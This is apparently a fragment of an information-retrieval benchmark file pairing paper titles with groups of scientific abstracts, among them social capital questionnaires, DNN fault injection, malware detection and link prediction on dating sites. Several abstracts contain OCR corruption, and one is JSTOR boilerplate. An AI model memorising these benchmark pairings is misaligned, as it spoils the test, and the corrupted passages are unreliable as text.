"text": "Let G = (V, E) be a directed graph with a distinguished source vertex s. The single-source path expression problem is to find, for each vertex v, a regular expression P(s, v) which represents the set of all paths in G from s to v A solution to this problem can be used to solve shortest path problems, solve sparse systems of linear equations, and carry out global flow analysis. A method is described for computing path expressions by dwidmg G mto components, computing path expressions on the components by Gaussian elimination, and combining the solutions This method requires O(ma(m, n)) time on a reducible flow graph, where n Is the number of vertices m G, m is the number of edges in G, and a is a functional inverse of Ackermann's function The method makes use of an algonthm for evaluating functions defined on paths in trees. A smapllfied version of the algorithm, which runs in O(m log n) time on reducible flow graphs, is quite easy to implement and efficient m practice",
"title": ""
},
{
"docid": "7bbe2345cfc5437d15f5db8c24205a10",
"text": "Studying the bursty nature of cascades in social media is practically important in many applications such as product sales prediction, disaster relief, and stock market prediction. Although the cascade volume prediction has been extensively studied, how to predict when a burst will come remains an open problem. It is challenging to predict the time of the burst due to the “quick rise and fall” pattern and the diverse time spans of the cascades. To this end, this paper proposes a classification based approach for burst time prediction by utilizing and modeling rich knowledge in information diffusion. Particularly, we first propose a time window based approach to predict in which time window the burst will appear. This paves the way to transform the time prediction task to a classification problem. To address the challenge that the original time series data of the cascade popularity only are not sufficient for predicting cascades with diverse magnitudes and time spans, we explore rich information diffusion related knowledge and model them in a scale-independent manner. Extensive experiments on a Sina Weibo reposting dataset demonstrate the superior performance of the proposed approach in accurately predicting the burst time of posts.",
"title": ""
},
{
"docid": "5c3b5f415c2789a01e0314487c281dee",
"text": "In this paper we propose two algorithms for numerical fractional integration and Caputo fractional differentiation. We present a modification of trapezoidal rule that is used to approximate finite integrals, the new modification extends the application of the rule to approximate integrals of arbitrary order a > 0. We then, using the new modification derive an algorithm to approximate fractional derivatives of arbitrary order a > 0, where the fractional derivative based on Caputo definition, for a given function by a weighted sum of function and its ordinary derivatives values at specified points. The study is conducted through illustrative examples and error analysis. 2005 Elsevier Inc. All rights reserved.",
"title": ""
},
{
"docid": "fba60a0dafd02886bd05c307a14da93b",
"text": "Deep neural network (DNN), being able to effectively learn from a training set and provide highly accurate classification results, has become the de-facto technique used in many mission-critical systems. The security of DNN itself is therefore of great concern. In this paper, we investigate the impact of fault injection attacks on DNN, wherein attackers try to misclassify a specified input pattern into an adversarial class by modifying the parameters used in DNN via fault injection. We propose two kinds of fault injection attacks to achieve this objective. Without considering stealthiness of the attack, single bias attack (SBA) only requires to modify one parameter in DNN for misclassification, based on the observation that the outputs of DNN may linearly depend on some parameters. Gradient descent attack (GDA) takes stealthiness into consideration. By controlling the amount of modification to DNN parameters, GDA is able to minimize the fault injection impact on input patterns other than the specified one. Experimental results demonstrate the effectiveness and efficiency of the proposed attacks.",
"title": ""
},
{
"docid": "e658507a3ed6c52d27c5db618f9fa8cb",
"text": "Accident prediction is one of the most critical aspects of road safety, whereby an accident can be predicted before it actually occurs and precautionary measures taken to avoid it. For this purpose, accident prediction models are popular in road safety analysis. Artificial intelligence (AI) is used in many real world applications, especially where outcomes and data are not same all the time and are influenced by occurrence of random changes. This paper presents a study on the existing approaches for the detection of unsafe driving patterns of a vehicle used to predict accidents. The literature covered in this paper is from the past 10 years, from 2004 to 2014. AI techniques are surveyed for the detection of unsafe driving style and crash prediction. A number of statistical methods which are used to predict the accidents by using different vehicle and driving features are also covered in this paper. The approaches studied in this paper are compared in terms of datasets and prediction performance. We also provide a list of datasets and simulators available for the scientific community to conduct research in the subject domain. The paper also identifies some of the critical open questions that need to be addressed for road safety using AI techniques.",
"title": ""
},
{
"docid": "d516a59094e3197bce709f4414db4517",
"text": "Authorship attribution deals with identifying the authors of anonymous texts. Traditionally, research in this field has focused on formal texts, such as essays and novels, but recently more attention has been given to texts generated by on-line users, such as e-mails and blogs. Authorship attribution of such on-line texts is a more challenging task than traditional authorship attribution, because such texts tend to be short, and the number of candidate authors is often larger than in traditional settings. We address this challenge by using topic models to obtain author representations. In addition to exploring novel ways of applying two popular topic models to this task, we test our new model that projects authors and documents to two disjoint topic spaces. Utilizing our model in authorship attribution yields state-of-the-art performance on several data sets, containing either formal texts written by a few authors or informal texts generated by tens to thousands of on-line users. We also present experimental results that demonstrate the applicability of topical author representations to two other problems: inferring the sentiment polarity of texts, and predicting the ratings that users would give to items such as movies.",
"title": ""
}
] | scidocsrr |
b0bd52eba641badd244bee42ea32e32b | Development and Validation of a Social Capital Questionnaire for Adolescent Students (SCQ-AS) | [
{
"docid": "c936e76e8db97b640a4123e66169d1b8",
"text": "Varying philosophical and theoretical orientations to qualitative inquiry remind us that issues of quality and credibility intersect with audience and intended research purposes. This overview examines ways of enhancing the quality and credibility of qualitative analysis by dealing with three distinct but related inquiry concerns: rigorous techniques and methods for gathering and analyzing qualitative data, including attention to validity, reliability, and triangulation; the credibility, competence, and perceived trustworthiness of the qualitative researcher; and the philosophical beliefs of evaluation users about such paradigm-based preferences as objectivity versus subjectivity, truth versus perspective, and generalizations versus extrapolations. Although this overview examines some general approaches to issues of credibility and data quality in qualitative analysis, it is important to acknowledge that particular philosophical underpinnings, specific paradigms, and special purposes for qualitative inquiry will typically include additional or substitute criteria for assuring and judging quality, validity, and credibility. Moreover, the context for these considerations has evolved. In early literature on evaluation methods the debate between qualitative and quantitative methodologists was often strident. In recent years the debate has softened. A consensus has gradually emerged that the important challenge is to match appropriately the methods to empirical questions and issues, and not to universally advocate any single methodological approach for all problems.",
"title": ""
}
] | [
{
"docid": "8e8dc6f3579cf4360118a4ce5550de7e",
"text": "In the Internet-age, malware poses a serious and evolving threat to security, making the detection of malware of utmost concern. Many research efforts have been conducted on intelligent malware detection by applying data mining and machine learning techniques. Though great results have been obtained with these methods, most of them are built on shallow learning architectures, which are still somewhat unsatisfying for malware detection problems. In this paper, based on the Windows Application Programming Interface (API) calls extracted from the Portable Executable (PE) files, we study how a deep learning architecture using the stacked AutoEncoders (SAEs) model can be designed for intelligent malware detection. The SAEs model performs as a greedy layerwise training operation for unsupervised feature learning, followed by supervised parameter fine-tuning (e.g., weights and offset vectors). To the best of our knowledge, this is the first work that deep learning using the SAEs model based on Windows API calls is investigated in malware detection for real industrial application. A comprehensive experimental study on a real and large sample collection from Comodo Cloud Security Center is performed to compare various malware detection approaches. Promising experimental results demonstrate that our proposed method can further improve the overall performance in malware detection compared with traditional shallow learning methods.",
"title": ""
},
{
"docid": "59b8ee881f8d458ee3d5a42ef2db662f",
"text": "For object detection, the two-stage approach (e.g., Faster R-CNN) has been achieving the highest accuracy, whereas the one-stage approach (e.g., SSD) has the advantage of high efficiency. To inherit the merits of both while overcoming their disadvantages, in this paper, we propose a novel single-shot based detector, called RefineDet, that achieves better accuracy than two-stage methods and maintains comparable efficiency of one-stage methods. RefineDet consists of two inter-connected modules, namely, the anchor refinement module and the object detection module. Specifically, the former aims to (1) filter out negative anchors to reduce search space for the classifier, and (2) coarsely adjust the locations and sizes of anchors to provide better initialization for the subsequent regressor. The latter module takes the refined anchors as the input from the former to further improve the regression accuracy and predict multi-class label. Meanwhile, we design a transfer connection block to transfer the features in the anchor refinement module to predict locations, sizes and class labels of objects in the object detection module. The multitask loss function enables us to train the whole network in an end-to-end way. Extensive experiments on PASCAL VOC 2007, PASCAL VOC 2012, and MS COCO demonstrate that RefineDet achieves state-of-the-art detection accuracy with high efficiency. Code is available at https://github.com/sfzhang15/RefineDet.",
"title": ""
},
{
"docid": "92d3987fc0b5d5962f50871ecc23743e",
"text": "Wireless sensor networks (WSNs) have become a hot area of research in recent years due to the realization of their ability in myriad applications including military surveillance, facility monitoring, target detection, and health care applications. However, many WSN design problems involve tradeoffs between multiple conflicting optimization objectives such as coverage preservation and energy conservation. Many of the existing sensor network design approaches, however, generally focus on a single optimization objective. For example, while both energy conservation in a cluster-based WSNs and coverage-maintenance protocols have been extensively studied in the past, these have not been integrated in a multi-objective optimization manner. This paper employs a recently developed multiobjective optimization algorithm, the so-called multi-objective evolutionary algorithm based on decomposition (MOEA/D) to solve simultaneously the coverage preservation and energy conservation design problems in cluster-based WSNs. The performance of the proposed approach, in terms of coverage and network lifetime is compared with a state-of-the-art evolutionary approach called NSGA II. Under the same environments, simulation results on different network topologies reveal that MOEA/D provides a feasible approach for extending the network lifetime while preserving more coverage area.",
"title": ""
},
{
"docid": "9775092feda3a71c1563475bae464541",
"text": "Open Shortest Path First (OSPF) is the most commonly used intra-domain internet routing protocol. Traffic flow is routed along shortest paths, sptitting flow at nodes where several outgoing tinks are on shortest paths to the destination. The weights of the tinks, and thereby the shortest path routes, can be changed by the network operator. The weights could be set proportional to their physical distances, but often the main goal is to avoid congestion, i.e. overloading of links, and the standard heuristic rec. ommended by Cisco is to make the weight of a link inversely proportional to its capacity. Our starting point was a proposed AT&T WorldNet backbone with demands projected from previous measurements. The desire was to optimize the weight setting based on the projected demands. We showed that optimiz@ the weight settings for a given set of demands is NP-hard, so we resorted to a local search heuristic. Surprisingly it turned out that for the proposed AT&T WorldNet backbone, we found weight settiis that performed within a few percent from that of the optimal general routing where the flow for each demand is optimalty distributed over all paths between source and destination. This contrasts the common belief that OSPF routing leads to congestion and it shows that for the network and demand matrix studied we cannot get a substantially better load balancing by switching to the proposed more flexible Multi-protocol Label Switching (MPLS) technologies. Our techniques were atso tested on synthetic internetworks, based on a model of Zegura et al. (INFOCOM’96), for which we dld not always get quite as close to the optimal general routing. However, we compared witIs standard heuristics, such as weights inversely proportional to the capac.. ity or proportioml to the physical distances, and found that, for the same network and capacities, we could support a 50 Yo-1 10% increase in the demands. Our assumed demand matrix can also be seen as modeling service level agreements (SLAS) with customers, with demands representing guarantees of throughput for virtnal leased lines. Keywords— OSPF, MPLS, traffic engineering, local search, hashing ta. bles, dynamic shortest paths, mntti-cosnmodity network flows.",
"title": ""
},
{
"docid": "125c145b143579528279e76d23fa3054",
"text": "Social unrest is endemic in many societies, and recent news has drawn attention to happenings in Latin America, the Middle East, and Eastern Europe. Civilian populations mobilize, sometimes spontaneously and sometimes in an organized manner, to raise awareness of key issues or to demand changes in governing or other organizational structures. It is of key interest to social scientists and policy makers to forecast civil unrest using indicators observed on media such as Twitter, news, and blogs. We present an event forecasting model using a notion of activity cascades in Twitter (proposed by Gonzalez-Bailon et al., 2011) to predict the occurrence of protests in three countries of Latin America: Brazil, Mexico, and Venezuela. The basic assumption is that the emergence of a suitably detected activity cascade is a precursor or a surrogate to a real protest event that will happen \"on the ground.\" Our model supports the theoretical characterization of large cascades using spectral properties and uses properties of detected cascades to forecast events. Experimental results on many datasets, including the recent June 2013 protests in Brazil, demonstrate the effectiveness of our approach.",
"title": ""
},
{
"docid": "62f0b66b176a87098b7f31e5a651eb5a",
"text": "Transfer learning has recently attracted significant research attention, as it simultaneously learns from different source domains, which have plenty of labeled data, and transfers the relevant knowledge to the target domain with limited labeled data to improve the prediction performance. We propose a Bayesian transfer learning framework, in the homogeneous transfer learning scenario, where the source and target domains are related through the joint prior density of the model parameters. The modeling of joint prior densities enables better understanding of the “transferability” between domains. We define a joint Wishart distribution for the precision matrices of the Gaussian feature-label distributions in the source and target domains to act like a bridge that transfers the useful information of the source domain to help classification in the target domain by improving the target posteriors. Using several theorems in multivariate statistics, the posteriors and posterior predictive densities are derived in closed forms with hypergeometric functions of matrix argument, leading to our novel closed-form and fast Optimal Bayesian Transfer Learning (OBTL) classifier. Experimental results on both synthetic and real-world benchmark data confirm the superb performance of the OBTL compared to the other state-of-the-art transfer learning and domain adaptation methods.",
"title": ""
},
{
"docid": "85d31f3940ee258589615661e596211d",
"text": "Bulk Synchronous Parallelism (BSP) provides a good model for parallel processing of many large-scale graph applications, however it is unsuitable/inefficient for graph applications that require coordination, such as graph-coloring, subcoloring, and clustering. To address this problem, we present an efficient modification to the BSP model to implement serializability (sequential consistency) without reducing the highlyparallel nature of BSP. Our modification bypasses the message queues in BSP and reads directly from the worker’s memory for the internal vertex executions. To ensure serializability, coordination is performed— implemented via dining philosophers or token ring— only for border vertices partitioned across workers. We implement our modifications to BSP on Giraph, an open-source clone of Google’s Pregel. We show through a graph-coloring application that our modified framework, Giraphx, provides much better performance than implementing the application using dining-philosophers over Giraph. In fact, Giraphx outperforms Giraph even for embarrassingly parallel applications that do not require coordination, e.g., PageRank.",
"title": ""
},
{
"docid": "3005c32c7cf0e90c59be75795e1c1fbc",
"text": "In this paper, a novel AR interface is proposed that provides generic solutions to the tasks involved in augmenting simultaneously different types of virtual information and processing of tracking data for natural interaction. Participants within the system can experience a real-time mixture of 3D objects, static video, images, textual information and 3D sound with the real environment. The user-friendly AR interface can achieve maximum interaction using simple but effective forms of collaboration based on the combinations of human–computer interaction techniques. To prove the feasibility of the interface, the use of indoor AR techniques are employed to construct innovative applications and demonstrate examples from heritage to learning systems. Finally, an initial evaluation of the AR interface including some initial results is presented.",
"title": ""
},
{
"docid": "90f188c1f021c16ad7c8515f1244c08a",
"text": "Minimally invasive principles should be the driving force behind rehabilitating young individuals affected by severe dental erosion. The maxillary anterior teeth of a patient, class ACE IV, has been treated following the most conservatory approach, the Sandwich Approach. These teeth, if restored by conventional dentistry (eg, crowns) would have required elective endodontic therapy and crown lengthening. To preserve the pulp vitality, six palatal resin composite veneers and four facial ceramic veneers were delivered instead with minimal, if any, removal of tooth structure. In this article, the details about the treatment are described.",
"title": ""
},
{
"docid": "7cc63b60c80e72fec2cc53679df74bf3",
"text": "Neural abstractive summarization models have led to promising results in summarizing relatively short documents. We propose the first model for abstractive summarization of single, longer-form documents (e.g., research papers). Our approach consists of a new hierarchical encoder that models the discourse structure of a document, and an attentive discourse-aware decoder to generate the summary. Empirical results on two large-scale datasets of scientific papers show that our model significantly outperforms state-of-the-art models.",
"title": ""
},
{
"docid": "21b8998910c792d389ccd8a6d8620555",
"text": "Theory and research suggest that people can increase their happiness through simple intentional positive activities, such as expressing gratitude or practicing kindness. Investigators have recently begun to study the optimal conditions under which positive activities increase happiness and the mechanisms by which these effects work. According to our positive-activity model, features of positive activities (e.g., their dosage and variety), features of persons (e.g., their motivation and effort), and person-activity fit moderate the effect of positive activities on well-being. Furthermore, the model posits four mediating variables: positive emotions, positive thoughts, positive behaviors, and need satisfaction. Empirical evidence supporting the model and future directions are discussed.",
"title": ""
},
{
"docid": "9ec200a078990407fc199c822f7f15b2",
"text": "We present Char2Wav, an end-to-end model for speech synthesis. Char2Wav has two components: a reader and a neural vocoder. The reader is an encoderdecoder model with attention. The encoder is a bidirectional recurrent neural network that accepts text or phonemes as inputs, while the decoder is a recurrent neural network (RNN) with attention that produces vocoder acoustic features. Neural vocoder refers to a conditional extension of SampleRNN which generates raw waveform samples from intermediate representations. Unlike traditional models for speech synthesis, Char2Wav learns to produce audio directly from text.",
"title": ""
},
{
"docid": "308622daf5f4005045f3d002f5251f8c",
"text": "The design of multiple human activity recognition applications in areas such as healthcare, sports and safety relies on wearable sensor technologies. However, when making decisions based on the data acquired by such sensors in practical situations, several factors related to sensor data alignment, data losses, and noise, among other experimental constraints, deteriorate data quality and model accuracy. To tackle these issues, this paper presents a data-driven iterative learning framework to classify human locomotion activities such as walk, stand, lie, and sit, extracted from the Opportunity dataset. Data acquired by twelve 3-axial acceleration sensors and seven inertial measurement units are initially de-noised using a two-stage consecutive filtering approach combining a band-pass Finite Impulse Response (FIR) and a wavelet filter. A series of statistical parameters are extracted from the kinematical features, including the principal components and singular value decomposition of roll, pitch, yaw and the norm of the axial components. The novel interactive learning procedure is then applied in order to minimize the number of samples required to classify human locomotion activities. Only those samples that are most distant from the centroids of data clusters, according to a measure presented in the paper, are selected as candidates for the training dataset. The newly built dataset is then used to train an SVM multi-class classifier. The latter will produce the lowest prediction error. The proposed learning framework ensures a high level of robustness to variations in the quality of input data, while only using a much lower number of training samples and therefore a much shorter training time, which is an important consideration given the large size of the dataset.",
"title": ""
},
{
"docid": "c17e6363762e0e9683b51c0704d43fa7",
"text": "Your use of the JSTOR archive indicates your acceptance of JSTOR's Terms and Conditions of Use, available at http://www.jstor.org/about/terms.html. JSTOR's Terms and Conditions of Use provides, in part, that unless you have obtained prior permission, you may not download an entire issue of a journal or multiple copies of articles, and you may use content in the JSTOR archive only for your personal, non-commercial use.",
"title": ""
},
{
"docid": "18a0eec596fb50bad21fde87162220cf",
"text": "In this work, the synthesis of stable silver nanoparticles by the bioreduction method was investigated. Aqueous extracts of the manna of hedysarum plant and the soap-root (Acanthe phylum bracteatum) plant were used as reducing and stabilizing agents, respectively. UV-Vis absorption spectroscopy was used to monitor the quantitative formation of silver nanoparticles. The characteristics of the obtained silver nanoparticles were studied using X-ray diffraction analysis (XRD), energy-dispersive spectroscopy (EDX), and scanning electron microscopy (SEM). The EDX spectrum of the solution containing silver nanoparticles confirmed the presence of an elemental silver signal without any peaks of impurities. The average diameter of the prepared nanoparticles in solution was about 29-68 nm.",
"title": ""
},
{
"docid": "74fcade8e5f5f93f3ffa27c4d9130b9f",
"text": "Resampling is an important signature of manipulated images. In this paper, we propose two methods to detect and localize image manipulations based on a combination of resampling features and deep learning. In the first method, the Radon transform of resampling features are computed on overlapping image patches. Deep learning classifiers and a Gaussian conditional random field model are then used to create a heatmap. Tampered regions are located using a Random Walker segmentation method. In the second method, resampling features computed on overlapping image patches are passed through a Long short-term memory (LSTM) based network for classification and localization. We compare the performance of detection/localization of both these methods. Our experimental results show that both techniques are effective in detecting and localizing digital image forgeries.",
"title": ""
},
{
"docid": "1e3a9019adc6e39982c38326bb39c6de",
"text": "Mirror neurons are a relatively new phenomena, first observed in the premotor cortex of macaque monkeys when a number of neurons were observed to respond both when a monkey performed a goal orientated task, and when the monkey watched another (human or monkey) perform that task. A number of researchers have suggested that mirror neurons also exist in humans. It is proposed that a human mirror neuron system may contribute to a number of cognitive functions such as action understanding; ‘theory of mind’, humans’ abilities to infer another’s mental state through experiences or others’ behaviour; emotion understanding; imitation; and speech perception. Faulty human mirror neurons have even been suggested to underpin social impairments such as those characteristic of Autistic Spectrum Disorder (ASD). However, there has been much debate regarding the existence and functional roles of mirror neurons in humans. While there is much literature regarding human mirror neurons, the majority consist of reviews while few concern empirical experiments. Additionally concern has been expressed for some of the experimental methods used in empirical studies. A recent experiment from Mukamel et al. (2010) is the first of its kind to directly gather evidence for the existence of mirror neurons in humans and for their function subserving action understanding. The present review critically outlines the growth in this controversial field of research, taking into account the recent direct recording of human mirror neurons, and what implications this may have on our understanding of social cognition.",
"title": ""
},
{
"docid": "2247a7972e853221e0e04c9761847c04",
"text": "Recently, as real-time Ethernet based protocols, especially EtherCAT have become more widely used in various fields such as automation systems and motion control, many studies on their design have been conducted. In this paper, we describe a method for the design of an EtherCAT slave module we developed and its application to a closed loop motor drive. Our EtherCAT slave module consists of the ARM Cortex-M3 as the host controller and ET1100 as the EtherCAT slave controller. These were interfaced with a parallel interface instead of the SPI used by many researchers and developers. To measure the performance of this device, 32-axis closed loop step motor drives were used and the experimental results in the test environment are described.",
"title": ""
},
{
"docid": "ae4b651ea8bd6b4c7c6efcc52f76516e",
"text": "We study a regularization framework where we feed an original clean data point and a nearby point through a mapping, which is then penalized by the Euclidian distance between the corresponding outputs. The nearby point may be chosen randomly or adversarially. A more general form of this framework has been presented in (Bachman et al., 2014). We relate this framework to many existing regularization methods: It is a stochastic estimate of penalizing the Frobenius norm of the Jacobian of the mapping as in Poggio & Girosi (1990), it generalizes noise regularization (Sietsma & Dow, 1991), and it is a simplification of the canonical regularization term by the ladder networks in Rasmus et al. (2015). We also investigate the connection to virtual adversarial training (VAT) (Miyato et al., 2016) and show how VAT can be interpreted as penalizing the largest eigenvalue of a Fisher information matrix. Our contribution is discovering connections between the studied and other existing regularization methods.",
"title": ""
},
{
"docid": "394ba7f036d578def70082b8c31f315f",
"text": "With the rapid growth of web images, hashing has received increasing interests in large scale image retrieval. Research efforts have been devoted to learning compact binary codes that preserve semantic similarity based on labels. However, most of these hashing methods are designed to handle simple binary similarity. The complex multi-level semantic structure of images associated with multiple labels have not yet been well explored. Here we propose a deep semantic ranking based method for learning hash functions that preserve multilevel semantic similarity between multi-label images. In our approach, deep convolutional neural network is incorporated into hash functions to jointly learn feature representations and mappings from them to hash codes, which avoids the limitation of semantic representation power of hand-crafted features. Meanwhile, a ranking list that encodes the multilevel similarity information is employed to guide the learning of such deep hash functions. An effective scheme based on surrogate loss is used to solve the intractable optimization problem of nonsmooth and multivariate ranking measures involved in the learning procedure. Experimental results show the superiority of our proposed approach over several state-of-the-art hashing methods in term of ranking evaluation metrics when tested on multi-label image datasets.",
"title": ""
}
] | scidocsrr |
933e8eac678af7a21af65a2516cba2e4 | Predicting User Replying Behavior on a Large Online Dating Site | [
{
"docid": "29d9137c5fdc7e96e140f19acd6dee80",
"text": "Given a snapshot of a social network, can we infer which new interactions among its members are likely to occur in the near future? We formalize this question as the link prediction problem, and develop approaches to link prediction based on measures the \"proximity\" of nodes in a network. Experiments on large co-authorship networks suggest that information about future interactions can be extracted from network topology alone, and that fairly subtle measures for detecting node proximity can outperform more direct measures.",
"title": ""
},
{
"docid": "65fd482ac37852214fc82b4bc05c6f72",
"text": "This paper examines important factors for link prediction in networks and provides a general, high-performance framework for the prediction task. Link prediction in sparse networks presents a significant challenge due to the inherent disproportion of links that can form to links that do form. Previous research has typically approached this as an unsupervised problem. While this is not the first work to explore supervised learning, many factors significant in influencing and guiding classification remain unexplored. In this paper, we consider these factors by first motivating the use of a supervised framework through a careful investigation of issues such as network observational period, generality of existing methods, variance reduction, topological causes and degrees of imbalance, and sampling approaches. We also present an effective flow-based predicting algorithm, offer formal bounds on imbalance in sparse network link prediction, and employ an evaluation method appropriate for the observed imbalance. Our careful consideration of the above issues ultimately leads to a completely general framework that outperforms unsupervised link prediction methods by more than 30% AUC.",
"title": ""
},
{
"docid": "d438d948601b22f7de6ec9ecaaf04c63",
"text": "Location plays an essential role in our lives, bridging our online and offline worlds. This paper explores the interplay between people's location, interactions, and their social ties within a large real-world dataset. We present and evaluate Flap, a system that solves two intimately related tasks: link and location prediction in online social networks. For link prediction, Flap infers social ties by considering patterns in friendship formation, the content of people's messages, and user location. We show that while each component is a weak predictor of friendship alone, combining them results in a strong model, accurately identifying the majority of friendships. For location prediction, Flap implements a scalable probabilistic model of human mobility, where we treat users with known GPS positions as noisy sensors of the location of their friends. We explore supervised and unsupervised learning scenarios, and focus on the efficiency of both learning and inference. We evaluate Flap on a large sample of highly active users from two distinct geographical areas and show that it (1) reconstructs the entire friendship graph with high accuracy even when no edges are given; and (2) infers people's fine-grained location, even when they keep their data private and we can only access the location of their friends. Our models significantly outperform current comparable approaches to either task.",
"title": ""
}
] | [
{
"docid": "1ae16863be5df70d33d4a7f6a685ab17",
"text": "Frank Chen • Zvi Drezner • Jennifer K. Ryan • David Simchi-Levi Decision Sciences Department, National University of Singapore, 119260 Singapore Department of MS & IS, California State University, Fullerton, California 92834 School of Industrial Engineering, Purdue University, West Lafayette, Indiana 47907 Department of IE & MS, Northwestern University, Evanston, Illinois 60208 fbachen@nus.edu.sg • drezner@exchange.fullerton.edu • jkryan@ecn.purdue.edu • levi@iems.nwu.edu",
"title": ""
},
{
"docid": "30038a6e8aa8380d65d33ff5ad6da191",
"text": "Summary\nState-of-the-art light and electron microscopes are capable of acquiring large image datasets, but quantitatively evaluating the data often involves manually annotating structures of interest. This process is time-consuming and often a major bottleneck in the evaluation pipeline. To overcome this problem, we have introduced the Trainable Weka Segmentation (TWS), a machine learning tool that leverages a limited number of manual annotations in order to train a classifier and segment the remaining data automatically. In addition, TWS can provide unsupervised segmentation learning schemes (clustering) and can be customized to employ user-designed image features or classifiers.\n\n\nAvailability and Implementation\nTWS is distributed as open-source software as part of the Fiji image processing distribution of ImageJ at http://imagej.net/Trainable_Weka_Segmentation .\n\n\nContact\nignacio.arganda@ehu.eus.\n\n\nSupplementary information\nSupplementary data are available at Bioinformatics online.",
"title": ""
},
{
"docid": "0220627680b0cadbb3241cb20ff0b962",
"text": "One of the biggest health challenges of 21st century is diabetics due to its exponential increase in the diabetics patients in the age group of 20–79 years. To prevent the complication due to diabetics it is essential to monitor the blood glucose level continuously. Most of the regular glucose measurement systems are invasive in nature. Invasive methods cause pain, time consumption, high cost and potential risk of spreading infection diseases. Therefore there is a great demand to have reliable cost effective and comfortable non invasive system for the detection of blood glucose level continuously. The proposed method is based on the direct effect of glucose on the scattering properties of the organ. Glucose decreases the mismatch in refractive index between scatterers and their surrounding media, leading to a smaller scattering coefficient and, consequently, a shorter optical path. The reduction in scattering is due to an increase in glucose concentration. As a result, with the growing concentration of glucose, fewer photons are absorbed and the light intensity increases. In the present work, we have used PPG technique. An algorithm was developed from the PPG data for monitoring blood glucose. The result obtained from this technique was compared with ARKRAY, Glucocard tm01-mini and found good agreement.",
"title": ""
},
{
"docid": "1285bd50bb6462b9864d61a59e77435e",
"text": "Precision Agriculture is advancing but not as fast as predicted 5 years ago. The development of proper decision-support systems for implementing precision decisions remains a major stumbling block to adoption. Other critical research issues are discussed, namely, insufficient recognition of temporal variation, lack of whole-farm focus, crop quality assessment methods, product tracking and environmental auditing. A generic research programme for precision agriculture is presented. A typology of agriculture countries is introduced and the potential of each type for precision agriculture discussed.",
"title": ""
},
{
"docid": "a74fbe2dc0f233420f6f0ec336124957",
"text": "The study aims for development of an efficient polymeric carrier for evaluating pharmaceutical potentialities in modulating the drug profile of quercetin (QUE) in anti-diabetic research. Alginate and succinyl chitosan are focused in this investigation for encapsulating quercetin into core-shell nanoparticles through ionic cross linking. The FT-IR, XRD, NMR, SEM, TEM, drug entrapment and loading efficiency are commenced to examine the efficacy of the prepared nanoparticles in successful quercetin delivery. Obtained results showed the minimum particle size of ∼91.58nm and ∼95% quercetin encapsulation efficiently of the particles with significant pH sensitivity. Kinetics of drug release suggested self-sustained QUE release following the non-fickian trend. A pronounced hypoglycaemic effect and efficient maintenance of glucose homeostasis was evident in diabetic rat after peroral delivery of these quercetin nanoparticles in comparison to free oral quercetin. This suggests the fabrication of an efficient carrier of oral quercetin for diabetes treatment.",
"title": ""
},
{
"docid": "3ae7bf75f82584fea608d49dfe3b63ad",
"text": "History sniffing attacks allow web sites to learn about users' visits to other sites. The major browsers have recently adopted a defense against the current strategies for history sniffing. In a user study with 307 participants, we demonstrate that history sniffing remains feasible via interactive techniques which are not covered by the defense. While these techniques are slower and cannot hope to learn as much about users' browsing history, we see no practical way to defend against them.",
"title": ""
},
{
"docid": "999aef425b90782b85c9b5e8b32129d7",
"text": "Data analysis has become a fundamental task in analytical chemistry due to the great quantity of analytical information provided by modern analytical instruments. Supervised pattern recognition aims to establish a classification model based on experimental data in order to assign unknown samples to a previously defined sample class based on its pattern of measured features. The basis of the supervised pattern recognition techniques mostly used in food analysis are reviewed, making special emphasis on the practical requirements of the measured data and discussing common misconceptions and errors that might arise. Applications of supervised pattern recognition in the field of food chemistry appearing in bibliography in the last two years are also reviewed.",
"title": ""
},
{
"docid": "4f5afcb6bd3f731c15e22beadc13f877",
"text": "Continuous improvements in communication technologies over copper pair access networks have enabled hybrid fiber/copper access networks that provide ever increasing broadband data rates. Most recently, field trials have demonstrated that crosstalk cancellation, also referred to as vectoring, and bonding two pairs to push data rates of very high speed DSL above 100 Mb/s on a single copper pair and above 200 Mb/s on two copper pairs. Looking ahead, the G.fast project group of the ITU-T is currently defining a new copper access technology to provide aggregate (upstream and downstream) data rates of up to 1 Gb/s over distances up to 250 m. This article provides an overview of some key challenges that need to be addressed for G.fast.",
"title": ""
},
{
"docid": "3458d30f25a6748748a6e793d64a9ea2",
"text": "A Monte Carlo c^timization technique called \"simulated annealing\" is a descent algorithm modified by random ascent moves in order to escape local minima which are not global minima. Tlie levd of randomization is determined by a control parameter T, called temperature, which tends to zero according to a deterministic \"cooling schedule\". We give a simple necessary and suffident conditicm on the cooling sdiedule for the algorithm state to converge in probability to the set of globally minimiim cost states. In the spedal case that the cooling schedule has parameuic form r({) » c/log(l + / ) , the condition for convergence is that c be greater than or equal to the depth, suitably defined, of the deepest local minimum which is not a global minimum state.",
"title": ""
},
{
"docid": "bc98a124101c25116182a1a8f21e328e",
"text": "Serverless computing lets businesses and application developers focus on the program they need to run, without worrying about the machine on which it runs, or the resources it requires.",
"title": ""
},
{
"docid": "f5a8b13fbf2376cf94acd47e5ffe1178",
"text": "P is computed by a Seq2Seq model with attention, requires utterance x but not logical form y. ● Active learning score = linear combination of features using weights from binary classifier. ○ Predict if Forward S2S selects utterances. ○ Trained on ATIS dev corpus. ● Binary classifier to predict Forward S2S using ○ RNN LF language model ○ Backward S2S model ● Margins between the best and second best hypotheses ● Source token frequency ● Utterance log loss ● Encoder and decoder last hidden states Backward Classifier",
"title": ""
},
{
"docid": "59d194764511b1ad2ce0ca5d858fab21",
"text": "Humanoid robot path finding is one of the core-technologies in robot research domain. This paper presents an approach to finding a path for robot motion by fusing images taken by the NAO's camera and proximity information delivered by sonar sensors. The NAO robot takes an image around its surroundings, uses the fuzzy color extractor to segment its potential path colors, and selects a fitting line as path by the least squares method. Therefore, the NAO robot is able to perform the automatic navigation according to the selected path. As a result, the experiments are conducted to navigate the NAO robot to walk to a given destination and to grasp a box. In addition, the NAO robot uses its sonar sensors to detect a barrier and helps pick up the box with its hands.",
"title": ""
},
{
"docid": "26cd7a502fcbf2455b58365299dc8432",
